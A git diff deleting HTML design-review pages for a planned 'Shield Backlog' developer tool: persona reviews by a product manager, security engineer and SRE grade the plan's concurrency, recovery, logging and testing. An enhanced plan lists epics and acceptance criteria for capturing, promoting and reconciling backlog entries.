PRD §10 names behavioral-change risks with mitigations + owner; the load-bearing "agents reliably surface follow-up work" assumption is explicitly flagged unvalidated with a revisit trigger; §7 tracks capture-friction as a metric.

-

PM8 — Success metrics — A (Important)

-
{
-  "id": "PM8", "name": "Success metrics", "persona": "product-manager",
-  "grade": "A", "severity": "Important",
-  "evidence_quote": "≥70% reach a terminal state (promoted/landed in a plan, or explicitly dropped) within 30 days; <20% sit untouched >60 days",
-  "gap": null, "suggestion": null
-}
-
-

PRD §7 has a quantified, time-bound metrics table (≥70%, <20%, 100%, ≥60%) with counters and a stated manual/git-history measurement plan (TRD N6). Soft spot: "capture friction" is qualitative.

-

PM9 — Reversibility & exit cost — A (Warning)

-
{
-  "id": "PM9", "name": "Reversibility & exit cost", "persona": "product-manager",
-  "grade": "A", "severity": "Warning",
-  "evidence_quote": "**Steps to undo:** `backlog.json` is git-tracked — `git revert` (or restore the file) recovers any wrongly-removed entry. The `/backlog` command is additive to the plugin; not invoking it is a complete disable.",
-  "gap": null, "suggestion": null
-}
-
-

TRD §14 assesses the exit ramp, staged risk profile, and a named fallback trigger; corroborated by §6 N4 and §9 schema_version migration.

-

PM10 — Business value alignment — C (Critical)

-
{
-  "id": "PM10", "name": "Business value alignment", "persona": "product-manager",
-  "grade": "C", "severity": "Critical",
-  "evidence_quote": "**(unvalidated)** The volume/loss of future-work items today is high enough to justify the tool — no baseline count has been measured; v1's own `backlog.json` history will validate it.",
-  "gap": "The tool's core justification is an operational-savings claim (avoiding lost future-work) that the docs themselves flag as unvalidated with no measured baseline, so the business value is asserted rather than evidenced.",
-  "suggestion": "Capture even a rough baseline — e.g. count lost/re-derived future-work items over a recent week of Shield usage from git history or chat logs — to ground the operational-savings claim before committing all four milestones."
-}
-
- - - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html deleted file mode 100644 index ed0a6fda..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html +++ /dev/null @@ -1,176 +0,0 @@ - - - - - -Shield Plan Review - - - -
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

Security Engineer — Detailed Findings

-
-

Back to summary

-
-

Security Engineer Review (Grade: B)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#Evaluation PointGradeNotes
SE1Threat model coverageBConcrete threats are named and mitigated: concurrent-write corruption (N1), wrong removal / epic-name collision (PRD §10 risk table, TRD §14 trigger), read-contract drift (N3). Adversary model is implicit ("single actor, no network"), which is reasonable for the asset, but there's no explicit enumeration of the agent-as-actor threat: an source=agent writer is a semi-trusted automated actor that can inject entries unattended. No threat for malicious/garbage content reaching downstream /plan//implement via the transient promotion reference.
SE2Least-privilege designB+Genuinely good for the scope. Promotion deliberately does NOT stamp ids into plan.json (F6/EPIC-3-S1) — minimizes write surface into the trusted artifact. Reconciliation is read-only against manifest.json/plan.json and only writes backlog.json. Removal is gated (never-remove-on-doubt). The only write privilege is to one file.
SE3Data protectionA−Strong for local tooling. N4 makes removal recoverable via git revert; N1 protects integrity; atomic temp-then-rename prevents partial writes. The one gap: "plain delete, no retained history" (F5/EPIC-1-S4) means manual remove of an uncommitted entry that was never git-committed is unrecoverable — N4's recoverability claim only holds for entries that reached a commit. Not called out.
SE4Secrets managementACorrectly scoped: TRD §9 "Secrets/auth: none — local file, no network, single actor." backlog.json holds work-item text only. No secret storage surface exists. The risk worth one line — free-text capture could accidentally contain a pasted secret that then lands in git history — is not mentioned, but it's a Warning at most.
SE5Network securityAGenuinely out of scope and correctly claimed. No network surface; not penalized per instructions.
SE6Access controlBSingle-actor claim is justified for a local dev file. But "access control" here maps to the agent-vs-user write distinction, which the plan models (source ∈ {user, agent}) but does not enforce or use as a trust signal — an agent-captured entry is treated identically to a user one at promotion/reconciliation. That's acceptable for v1 but the source field's security purpose (provenance/audit) is undefined.
SE7Compliance requirementsAN5 makes the explicit data-classification claim: internal, non-PII developer work-item text, same trust boundary as plan.json/manifest.json. The claim is justified — the data co-locates with and is no more sensitive than artifacts already in the repo. No regulated data, no compliance regime applies. Well-reasoned, not hand-waved.
SE8Incident responseBTRD §14 has a real rollback/containment story: staged rollout (destructive reconciliation lands last, M3), an explicit trigger ("if eager prune produces a wrong removal git revert can't cheaply recover → disable eager prune, fall back to manual-remove-only"), and a kill switch (not invoking /backlog = full disable). Detection is the weak spot: a wrong removal is detected only by a human noticing a missing entry — N3 logs warnings on drift but nothing alerts on an actual erroneous removal.
SE9Acceptance criteria qualityB+ACs are largely specific and testable. Strong examples: "killing capture mid-write leaves no corrupted backlog.json (only a .tmp may remain)" (EPIC-1-S2), "prd-only feature is NOT removed" (EPIC-3-S2), "second pass is a no-op (idempotent)" (EPIC-3-S3), named validator errors. Gaps: N1's central race ("concurrent capture racing reconciliation") has no AC that actually exercises concurrency — the mid-write-kill AC tests crash-atomicity, not the two-writer race the NFR claims to defend. "Validate-or-refuse on read" has no AC proving a malformed file is refused rather than silently read.
SE10Edge case & rollback coverageA−Best-covered area. Edge cases enumerated and turned into fixtures (EPIC-4-S1): prd-only-stays, plan-committed-removed, ambiguous-stays, malformed-stays. Never-remove-on-doubt is the safety default. Rollback is git-revert + staged introduction + documented fallback trigger (§14). Missing edges: the .tmp cleanup ("cleaned on next run") has no failure-mode coverage if cleanup itself fails; epic-name collision across two features is mentioned as a risk but no fixture asserts it stays.
SE11Integration test strategyBEPIC-4 evals are self-contained, no-LLM, CI-wired, and cover the cross-file contract (backlog.json × manifest.json × plan.json) — good. But the eager-prune integration point (end of a real /plan / /implement run) is the highest-risk wiring and the eval covers it via fixtures, not via an actual command run. The read-contract coupling to upstream schemas (§11) is acknowledged but there's no contract test that fails when manifest/plan schema drifts.
SE12Regression risk assessmentA−Blast radius is well-bounded and stated: the only destructive behavior is entry removal (§14); /backlog is additive to the plugin; promotion is read-only against plan.json (no stamping → no regression to existing planning). Staged M1→M3 sequencing puts the risky reconciliation last behind a proven store. The unaddressed regression: eager-prune hooks into /plan and /implement — a bug there could affect those commands' exit behavior, and that blast radius isn't explicitly assessed.
SE13Environment validation planCWeakest point. No dev/staging/prod distinction (reasonable — it's local tooling), but there's also no smoke-test or first-run validation plan: how does a maintainer verify reconciliation is behaving correctly against their real backlog.json before trusting auto-removal? §14 mentions a fallback but not a "validate before enabling eager prune" canary step. The N2 performance budget (~1s, ≤50 features/200 entries) has no validation method attached.
SE14Security validationB−The security-relevant behaviors that DO get validated: atomicity (crash test), never-remove-on-doubt (fixtures), validator rejection of bad enums. Missing: no test asserting the validate-or-refuse refusal path actually refuses (only that crash leaves no corruption); no concurrency stress test for the N1 race; no negative test that promotion does NOT write to plan.json (F6 is the key trust-boundary guarantee and has an AC but no eval listed in EPIC-4-S1's coverage list).
-

Key Finding: The plan's core integrity and safety design is strong and well-reasoned for its scope (atomic write, never-remove-on-doubt, git-revert recoverability, staged rollout), and the N5 trust-boundary/classification claim is justified — but the N1 concurrency guarantee and the F6 no-stamping trust boundary are asserted without a test that actually exercises them, so the two most security-load-bearing claims are currently unverifiable.

-

Recommendations

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityPointRecommendation
P1SE9 / SE14Add an eval that exercises the actual N1 race, not just crash-atomicity: spawn a concurrent capture and a reconciliation write against the same backlog.json and assert no corruption and no lost entry. The mid-write-kill AC tests a different failure mode than the "capture racing reconciliation" the NFR claims to defend. Without it, N1 is an unverified assertion.
P1SE14Add a negative eval to EPIC-4-S1's coverage list asserting that promotion via /plan//implement leaves plan.json and story records byte-unchanged (no id stamping). F6 is the load-bearing trust-boundary guarantee; it has an AC but is absent from the listed eval coverage.
P1SE9Add an explicit AC (EPIC-1-S2) that a malformed/partial backlog.json on read is refused with a named error, not silently read or truncated. "Validate-or-refuse on read" is stated in F2/N1 but no AC proves the refusal path.
P2SE13Add a first-run / canary validation step before auto-removal is trusted: e.g. a --dry-run reconciliation mode that reports what would be removed, so a maintainer validates against their real backlog before enabling eager prune. Pairs naturally with the §14 fallback.
P2SE10 / SE14Add a fixture for epic-name collision across two different features (PRD §10 names it as a risk; §14 names it as the rollback trigger) asserting the entry stays. The proposed-new match-by-name path is the one place a wrong removal is plausible; it deserves a dedicated negative test.
P2SE1 / SE6Define the security purpose of the source ∈ {user, agent} field. Either state it is provenance/audit-only (and that agent and user entries are equally trusted at reconciliation), or use it. Right now an unattended source=agent writer is a semi-trusted actor with no distinct handling, and the threat model doesn't address agent-injected entries flowing into /plan via the transient reference.
P2SE3Note in N4/EPIC-1-S4 that git-revert recoverability only covers entries that reached a commit; a manual remove of an uncommitted entry is unrecoverable by design. Small doc fix that aligns the recoverability claim with the "plain delete, no history" decision.
-

Overall persona grade: B (point average ≈ 3.05 → B). The plan is security-sound for local single-actor tooling with a justified trust-boundary/classification claim and genuinely good integrity/rollback design; it falls short of A because its two most security-critical guarantees (N1 concurrency, F6 no-stamping) lack tests that exercise them, and environment/first-run validation (SE13) is thin.

- - - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html deleted file mode 100644 index ff0f8f27..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html +++ /dev/null @@ -1,129 +0,0 @@ - - - - - -Shield Plan Review - - - -
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

SRE — Detailed Findings

-
-

Back to summary

-
-

Operations Review — Plan (Grade: B)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#Evaluation PointGradeNotes
OP1Observability planBN6 explicitly chooses no telemetry in v1; observability = the logged warning on doubt (N3, EPIC-3-S2) plus git history of backlog.json (N4) as the audit trail. Removals are auditable via git commits. Two real gaps: (a) the positive removal path (eager prune / lazy sweep actually removing an entry) is never specified to log what it removed and why it matched — only the doubt path logs. A wrong-but-confident removal leaves no breadcrumb except a git diff with no rationale. (b) No log destination/format defined (stdout? a log file? structured?). For a 3am "why did my entry vanish" investigation, git-revert recovers the data but not the reasoning.
OP2Monitoring & alertingCAppropriately translated: there's no daemon to alert on, and §7 success metrics define a manual /backlog audit cadence as the "health check." But thresholds that should trigger action are named in the PRD (≥70% reach terminal state, <20% untouched >60d, ≥60% suggestion-acceptance) with no defined owner cadence or trigger beyond "periodic" — nobody is told when to audit or what reading means "intervene." The N2 ~1s budget (the one real performance signal) has a defined breach action (Q1, revisit epic index) which is good, but no way to measure latency is specified — the budget is unmonitorable as written.
OP3Failure mode analysisAStrongest area. The destructive path (reconciliation removal) is analyzed thoroughly: wrong/over-broad removal via epic-name collision (Risk table + §14 trigger), never-remove-on-doubt as the default-safe stance (F7, N3, EPIC-3-S2), concurrent-write corruption (N1, atomic temp-then-rename + validate-or-refuse), crash-mid-write leaving at most a .tmp (N1), malformed/old upstream shapes degrading to entry-stays not exception (N3). Cascading-failure analog (a manifest/plan shape change silently breaking reconciliation) is named as read-contract coupling (§9, §11) with a "flag this consumer" note. Recovery time is implicit (git revert) but the failure enumeration is excellent.
OP4Backup & recoveryBRPO/RTO analog handled by N4: backlog.json is git-tracked, so any wrong removal is recoverable via git revert — RPO = last commit, recovery is a documented one-liner. §14 adds a real fallback (disable eager prune, fall back to manual-remove-only). Gap: recovery assumes the file is committed — there is no statement about when backlog.json gets committed. If capture/removal happen between commits, an uncommitted wrong-removal during a working session is not recoverable by git revert (it'd need reflog/stash luck, and the eager prune fires automatically at end-of-run, possibly before any commit). The restore procedure is named but never tested/rehearsed (no eval asserts "revert restores a wrongly-pruned entry").
OP5Capacity planningBDirectly addressed and well-scoped for a local tool. N2 sets a concrete budget (~1s at ≤~50 features / ~200 entries) with a smart optimization already baked in (open only plan.json files the manifest flags as having a plan, not all of them). The scaling trigger and manual-intervention path are explicit: Q1 + N2 say "above that scale, revisit a project-level epic index," resolved data-driven post-M3. Gap: as noted in OP2, the budget has no measurement mechanism — "revisit if breached" is unfalsifiable without timing instrumentation, and the breach is something a human would only notice as "feels slow." The N2 numbers are also asserted, not derived from Q2's still-unmeasured volume baseline.
OP6Change managementAThe staged rollout is the standout operational decision: M1 ships read/append + manual-remove only; the destructive automatic reconciliation lands last in M3, deliberately so the risky path is introduced after the store is proven (§14, milestone deps M1→M2→M3). This is the file-tool equivalent of a canary — the blast-radius feature is gated behind two proven milestones. Rollback trigger is explicit (§14). "Not invoking /backlog is a complete disable" is a clean feature-flag analog. Eval gate (EPIC-4-S1) with RED→GREEN before release is a real merge gate. Minor: no per-trigger kill switch granularity beyond "disable eager prune" (lazy sweep on view has no independent off-switch documented).
OP7On-call readinessCTranslated to "can a future maintainer respond when reconciliation misbehaves." Partial: §14 gives a runbook-shaped recovery (git revert; disable eager prune; fall back to manual). EPIC-4-S2 commits to documenting capture/view/promote/remove + the three triggers + match key in the command and SKILL.md. Gaps: (a) the operator-facing diagnostic story is thin — when an entry wrongly vanishes, there's no documented "how to tell which trigger removed it and why" because the removal path doesn't log its rationale (see OP1). (b) "disable eager prune" is named as the mitigation but no mechanism for that toggle is specified anywhere in the plan/stories — it's an aspiration, not a shipped switch. (c) Owner is named (@ashwinimanoj, single maintainer) but there's no escalation analog and the manual-audit cadence is undefined.
-

Key Finding: The destructive path is thoughtfully de-risked by design (never-remove-on-doubt, staged M3-last rollout, git-revert recovery) — but the operational instrumentation around it is missing: successful removals aren't logged with rationale, the N2 latency budget has no measurement mechanism, and the §14 "disable eager prune" mitigation is named without any toggle actually being specified as a story.

-

Recommendations

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityPointRecommendation
P1OP7Add a story (or task under EPIC-3-S3) for an explicit kill switch — a .shield.json flag (e.g. backlog.auto_reconcile: false) that disables eager prune and lazy sweep independently, leaving manual-remove only. §14 names this fallback as the rollback action but no story ships the toggle, so the documented mitigation is currently unactionable.
P1OP1Make successful removals auditable, not just the doubt path. EPIC-3-S2/S3 should log every removal with {entry id, feature, epic, match-kind (id vs name), triggering run, the plan.json path that gated it}. Today only never-remove-on-doubt logs (N3); a confident-but-wrong removal leaves a git diff with no rationale — exactly the 3am case. Define the log destination/format too.
P1OP4Close the uncommitted-state recovery gap. Eager prune fires automatically at end-of-/plan//implement, potentially before backlog.json is committed — at which point git revert (N4) cannot recover the entry. Either (a) commit backlog.json before the destructive prune, or (b) write the pruned entry to a transient .shield/backlog-removed.log so it's recoverable independent of git.
P1OP2 / OP5Instrument the N2 ~1s budget. The budget and its breach action (Q1 epic-index) are well-specified but unmeasurable — add lightweight timing to /backlog view (even a debug-gated stderr line) so "revisit if breached" is falsifiable. Without it, the only signal is a human noticing slowness.
P2OP2 / OP7Give the manual audit a concrete cadence and trigger. §7 names threshold metrics (≥70% terminal, <20% >60d) but only "periodic" audit — specify when (e.g. monthly) and what reading triggers action so the single owner has an actual on-call procedure rather than an open-ended chore.
P2OP4Add an eval that rehearses recovery: assert that after a (simulated) wrong removal, git revert / file-restore brings the entry back. EPIC-4-S1 covers remove/prune/sweep behavior but never exercises the recovery procedure N4 relies on — an untested restore path is a latent 3am surprise.
-

Overall persona grade: B (point grades: A, C, A, B, B, A, C → average 3.0 → B). The plan is operationally mature where it matters most — failure-mode analysis (OP3) and staged change management (OP6) are A-grade, and the destructive path is genuinely well-contained. It loses ground on day-2 instrumentation: removals aren't logged with rationale, the performance budget can't be measured, and the headline rollback mitigation ("disable eager prune") is named but not shipped as a toggle.

- - - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html deleted file mode 100644 index b3fdd559..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html +++ /dev/null @@ -1,274 +0,0 @@ - - - - - -Shield Plan Review - - - -
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

Plan — Shield Backlog

-

Project: Shield · Phase: v1 · Domain: backend (Python) -PRD: ./prd.md (reviewed Ready, composite 3.1) · TRD: ./trd.md · Sidecar: ./plan.json

- -

A project-level Shield backlog: capture (user/agent) → user-driven promotion → reconciliation. Entries are removed when their work commits — eagerly at the end of a promoted /plan or /implement run, lazily on the /backlog view sweep, or manually. Matching is by feature (manifest.json index) + epic (plan.json gate); no ids are stamped.

-
-

Review note (P0 — gate 0d): Before this plan ships, paraphrase TRD §2 so it no longer -restates PRD §3 verbatim (current 92-char overlap exceeds the 80-char duplication threshold). -Summarize the problem in technical-framing terms and link to PRD §3 instead of repeating it.

- -
-

Milestones

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
IDNameDepends onOutcome
M1Capture + store + viewbacklog.json + schema/validator; capture (user + skill, atomic); /backlog ordered view with manifest status badges; manual remove.
M2Feature + epic association + suggestionM1Every entry carries feature + epic (existing or proposed-new); agent suggests from manifest/plan; user accept/replace/create-new.
M3Promotion + reconciliationM2Promotion via transient reference; reconciliation engine (match key, never-remove-on-doubt, drift tolerance); eager + lazy idempotent triggers; eval suite + version bump.
-
-

EPIC-1 — Store, schema & capture (M1)

-

EPIC-1-S1 · Define backlog.json schema and validator (high)

-

Define backlog.json shape + JSON Schema with a top-level schema_version, plus a Python validator. Entry: {id, order:int, kind∈{epic,story,task}, source∈{user,agent}, feature, epic, text}. schema_version is set now so future shape changes migrate read-old/write-new.

-
    -
  • Tasks: author shield/schema/backlog.schema.json; document entry shape + migration policy in shield/skills/general/backlog/SKILL.md; create shield/scripts/validate_backlog.py; ordering = single integer order. -
      -
    • - **Specify the `id` contract:** type (string), generation strategy (uuid4 / monotonic / slug — pick one and document it), and a schema-level **uniqueness** constraint across `entries[]`. Remove/promote/prune all key off `id`. -
    • -
    -
  • -
  • AC: schema rejects unknown kind (named error); validate_backlog.py exits 0/non-zero correctly; schema_version + migration policy present; enums constrained. -
      -
    • - **+ AC:** schema rejects an `entries[]` array containing duplicate `id` values, naming the error. -
    • -
    • - Either add a no-op `migrate(doc) -> doc` seam with a unit test, **or** reword the migration AC to "migration *policy* documented (doc-only until schema_version 2)" so it isn't mistaken for working code. -
    • -
    -
  • -
  • Design: §11 APIs Involved · LLD backlog-store (TODO)
  • -
-

EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write (high)

-

Capture usable by the user (/backlog add) and any skill (documented write helper). Atomic temp-then-rename + validate-or-refuse so concurrent capture vs reconciliation can't corrupt the file. Resolves PRD-review P1 (capture interface).

-
    -
  • Tasks: /backlog add (assigns next order); skill-callable write helper (text, kind, feature?, epic?, source); atomic write; validate-or-refuse. -
      -
    • - **Lock the write-helper signature here (do not defer to LLD):** pin name, module path, parameters, return type, and raise-on-invalid behavior — e.g. `capture(text, *, kind="task", feature=None, epic=None, source) -> entry_id` in `shield/scripts/backlog_store.py`. This is the carried-forward PRD-review P1 and the contract every capturing skill builds against; it cannot stay open as TRD §12 Q3. -
    • -
    • - **Name the concurrency strategy.** Temp-then-rename prevents a *torn* file but not lost updates (two read-modify-writes → last-writer-wins drops an entry). Either document the single-writer assumption explicitly *next to* the N1 threat statement (N5 already says "single actor"), or implement a lockfile / re-read-and-merge / `O_EXCL` temp. Name the atomic primitive used (`os.replace`). -
    • -
    -
  • -
  • AC: user + skill capture both work; interface documented; mid-write kill leaves no corruption; next order/default kind assigned. -
      -
    • - **+ AC:** a malformed/partial `backlog.json` on read is **refused with a named error** (validate-or-refuse refusal path), never silently read or truncated. -
    • -
    -
  • -
  • Design: §5 Functional Requirements · LLD backlog-store (TODO)
  • -
-

EPIC-1-S3 · /backlog view — ordered list (high)

-

/backlog command + skill rendering entries sorted by order with feature + epic + source.

-
    -
  • Tasks: author shield/commands/backlog.md + backlog/SKILL.md; render sorted; empty-backlog message.
  • -
  • AC: ascending-order list with feature/epic/source; clean empty message; command registered.
  • -
  • Design: §4 Product Journey
  • -
- -

EPIC-1-S4 · Manual remove from /backlog (medium)

-

/backlog remove <id> — plain delete for ideas decided against / entries no run will clear.

-
    -
  • Tasks: remove <id> via atomic helper; confirm-before-delete; clear error on absent id.
  • -
  • AC: deletes + persists atomically; absent id = clear no-op error; no history retained. -
      -
    • - Note (doc): `git revert` recoverability (N4) covers only entries that reached a commit; a manual remove of an *uncommitted* entry is unrecoverable by design. -
    • -
    -
  • -
  • Design: §5 Functional Requirements
  • -
-
-

EPIC-2 — Association & pipeline status

-

EPIC-2-S1 · Per-entry pipeline status from manifest.json (high, M1)

-

/backlog view shows each entry's feature pipeline status (research/prd/plan) read live from manifest.json — so "prd done, not yet planned" is visible without removal.

-
    -
  • Tasks: read manifest; render status badges per entry; not started when feature absent; compute at view time (no stored status).
  • -
  • AC: badges derived from manifest; prd-but-no-plan shows prd ✓ plan – and stays; absent feature → not started.
  • -
  • Design: §7 High-Level Design
  • -
-

EPIC-2-S2 · Feature + epic association + agent suggestion (high, M2)

-

Associate every entry with a feature (reconciliation key) + epic (removal gate), either proposed-new; agent suggests feature (manifest) + epic (plan.json); user accept/replace/create-new.

-
    -
  • Tasks: prompt/accept feature + epic (allow proposed-new); suggest by scanning manifest + candidate plan.json; never block capture. -
      -
    • - **Define the suggestion + match heuristic concretely** (no "best match" hand-wave): the matching method (e.g. case-insensitive, whitespace-normalized substring + token-overlap ranking on feature/epic names), the tie-break/ambiguity rule (→ entry stays, never auto-pick on a tie), and epic-rename behavior. Resolve PRD §9's open "discovery cost" question or land `/lld epic-suggester`. -
    • -
    -
  • -
  • AC: every entry has feature + epic; ≥1 feature + ≥1 epic candidate proposed when matches exist; capture succeeds with proposed-new when none. -
      -
    • - **+ measurable AC:** given a fixture manifest with feature `auth`, capturing text mentioning "auth" surfaces `auth` as the top candidate; a 2-way name tie surfaces both and auto-picks neither. -
    • -
    -
  • -
  • Design: §5 Functional Requirements · LLD epic-suggester (TODO)
  • -
-
-

EPIC-3 — Promotion & reconciliation (M3)

-

EPIC-3-S1 · User-driven promotion with transient reference (high)

-

/backlog promote <id> launches the user-chosen step (/research//prd//plan//implement) and passes the entry id as a transient runtime reference — never stamped into plan.json.

-
    -
  • Tasks: promote <id> affordance; forward id as transient reference; document non-persistence; shippable work routes through /plan, direct /implement for rare planless one-offs.
  • -
  • AC: promotion starts the chosen step + forwards the reference; reference not persisted to plan.json/stories; tool never auto-routes.
  • -
  • Design: §4 Product Journey
  • -
- -

EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) (high)

-

Locate feature in manifest.json; if it has a plan.json, check the entry's epic. Match: existing epic → by id; proposed-new → by epic name. Ambiguity/no-match → entry stays. Unknown manifest/plan shapes → doubt (stays), never crash.

-
    -
  • Tasks: shield/scripts/reconcile_backlog.py; match key impl; never-remove-on-doubt; drift tolerance with logged warning. -
      -
    • - **State the "epic landed" gate as one precise predicate** and use it everywhere: "an entry is removed when an epic with the matching id (existing) or normalized name (proposed-new) is **present in `plan.json.epics[]`**; story `status` is **not** consulted." F7, the EPIC-3-S2 AC, and the schema currently word this three ways. -
    • -
    • - **Log every removal with rationale** to a defined destination/format: `{entry id, feature, epic, match-kind (id|name), triggering run, gating plan.json path}`. Today only the never-remove-on-doubt path logs (N3); a confident-but-wrong removal must not be a silent git diff. -
    • -
    -
  • -
  • AC: plan-committed epic selected for removal, prd-only not; id/name match per case; malformed/old shapes → entry stays (logged), no exception. -
      -
    • - **+ fixture/AC:** epic-name collision across two different features → ambiguous → entry stays (the one place a wrong removal is plausible; PRD §10 risk / §14 trigger). -
    • -
    -
  • -
  • Design: §7 High-Level Design · LLD reconciler (TODO)
  • -
-

EPIC-3-S3 · Eager + lazy removal triggers (idempotent) (high)

-

Eager prune at end of promoted /plan//implement (via the transient reference); lazy sweep on /backlog view. Both idempotent; both call the one reconciliation engine.

-
    -
  • Tasks: eager prune hook at end of /plan + /implement; lazy sweep on view; idempotent remove-if-present; shared engine. -
      -
    • - **Ship the kill switch.** Add a `.shield.json` flag (e.g. `backlog.auto_reconcile: false`) that disables eager prune and lazy sweep **independently**, leaving manual-remove only. §14 names this as the rollback fallback but no story currently delivers it — without it the documented mitigation is unactionable. -
    • -
    • - **Close the uncommitted-state recovery gap.** Eager prune fires at end-of-run, possibly before `backlog.json` is committed, so `git revert` (N4) can't recover. Either commit `backlog.json` before the destructive prune, or append pruned entries to a transient `.shield/backlog-removed.log`. -
    • -
    • - **Instrument the N2 ~1s budget.** Add a debug-gated latency line to `/backlog` view so "revisit if breached" (Q1 epic-index) is falsifiable, not "a human notices slowness." -
    • -
    -
  • -
  • AC: promotion removes referenced entry at end of run (eager); sweep removes plan-committed entries (lazy); second pass is a no-op (idempotent); shared engine.
  • -
  • Design: §7 High-Level Design · LLD reconciler (TODO)
  • -
-
-

EPIC-4 — Eval coverage & release (M3)

-

EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) (high)

-

Per CLAUDE.md eval mandate: cover capture (user + skill), view + status, manual remove, eager prune, lazy sweep, match-key, never-remove-on-doubt.

-
    -
  • Tasks: fixtures (prd-only-stays, plan-committed-removed, ambiguous-stays, malformed-stays); evals for each behavior; wire into CI; capture RED + GREEN in PR. -
      -
    • - **+ concurrency eval:** two interleaved captures (and a capture racing a reconciliation write) against the same `backlog.json` assert no corruption **and no lost entry** — the actual N1 threat, distinct from the crash-mid-write test. -
    • -
    • - **+ no-stamping eval (F6):** after promotion via `/plan`/`/implement`, assert `plan.json` and story records are **byte-unchanged**. F6 is the load-bearing trust boundary and is currently absent from the eval coverage list. -
    • -
    • - **+ recovery-rehearsal eval:** after a simulated wrong removal, assert `git revert` / file-restore brings the entry back (exercises the N4 recovery path the plan relies on). -
    • -
    • - Name the CI entrypoint explicitly (which runner under `shield/evals/`) and the path-filter glob scoping "backlog assets" (e.g. `shield/{schema,scripts,skills/general/backlog}/**`, `shield/commands/backlog.md`). -
    • -
    -
  • -
  • AC: eval suite under shield/evals/ covers all behaviors; self-contained (no API/LLM); PR body has RED + GREEN; CI runs on backlog-asset PRs.
  • -
  • Design: §10 Milestones
  • -
-

EPIC-4-S2 · Version bump + command/skill docs (medium)

-

Bump the Shield plugin version (marketplace.json + pyproject where touched) in the same commit as asset changes; finalize /backlog + backlog SKILL.md docs.

-
    -
  • Tasks: bump marketplace.json; bump touched pyproject.toml; finalize command/skill docs (capture, triggers, match key, manual remove, badges); CHANGELOG. -
      -
    • - Add explicit DoD lines: "PR reviewed and merged" and "marketplace version published" so 'done' is unambiguous. -
    • -
    • - Document the manual `/backlog` audit cadence (e.g. monthly) and which §7 reading triggers action — the single owner needs a concrete on-call procedure, not "periodic." -
    • -
    -
  • -
  • AC: version bumped in same commit; command + SKILL document capture/view/promote/remove + 3 triggers; CHANGELOG mentions the feature.
  • -
  • Design: §13 References
  • -
-
-

Pre-build action: validate the bet (P1 — PM10)

- -

Before committing all four milestones, capture a rough baseline of lost / re-derived future-work -items over a recent week of Shield usage (from git history or chat logs) to ground the -operational-savings claim. The PRD itself (§10) flags this as the load-bearing unvalidated -assumption; a cheap baseline now de-risks the whole investment and seeds the §7 success metric.

-
-

Carried forward from PRD-review (Ready, run _2)

-
    -
  • Capture-from-skill interface defined → EPIC-1-S2 / TRD §11. (Review note: still open as TRD §12 Q3 — P1 #1 closes it.)
  • -
  • backlog.json schema_version + migration → EPIC-1-S1 / TRD §9.
  • -
  • Reconciliation read-contract drift tolerance → EPIC-3-S2 / TRD §6 N3.
  • -
  • Eager-prune + lazy-sweep idempotency → EPIC-3-S3 / TRD §5 F8.
  • -
-

Next steps

-
    -
  • /pm-sync — sync epics + stories to ClickUp.
  • -
  • /implement — begin TDD implementation (start at M1 / EPIC-1-S1 once the P0 doc-fix and the EPIC-1 P1s are folded in).
  • -
- - - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html deleted file mode 100644 index f3c13635..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html +++ /dev/null @@ -1,235 +0,0 @@ - - - - - -Review — backlog-20260527 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

Plan Review — Shield Backlog

-

Date: 2026-05-27 -Plan: docs/shield/backlog-20260527/ (plan.md + trd.md + plan.json) -Source PRD: prd.md (type: lean) · prior PRD-review: reviews/prd/2026-05-27_2 (Ready, 3.12) -Reviewers: DX Engineer, Agile Coach, Backend Engineer, Security Engineer, SRE, Product Manager (PM1–PM10) -Composite Score: B (3.14) — Ready · 1 P0 (deterministic gate) · 12 P1 · 13 P2

-
-

Verdict: Ready, pending one P0 doc-fix. The plan is well-structured, MVP-disciplined, and -error-handling-first; the milestone DAG is acyclic and fully covered; the reconciliation -read-contract was verified accurate against the live manifest.json/plan-sidecar.schema.json. -The single P0 is a cheap one-line paraphrase (TRD §2 restates PRD §3 verbatim). The 12 P1s -cluster around four real gaps the implementers should close first: the skill write-helper -signature is still open, atomicity is conflated with isolation (lost-update path), the -match heuristic is undefined, and several load-bearing guarantees lack tests / shipped -toggles (F6 no-stamping, validate-or-refuse, the §14 kill switch, removal audit logging).

-
-

Score Summary

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PersonaWeightGradeKey Finding
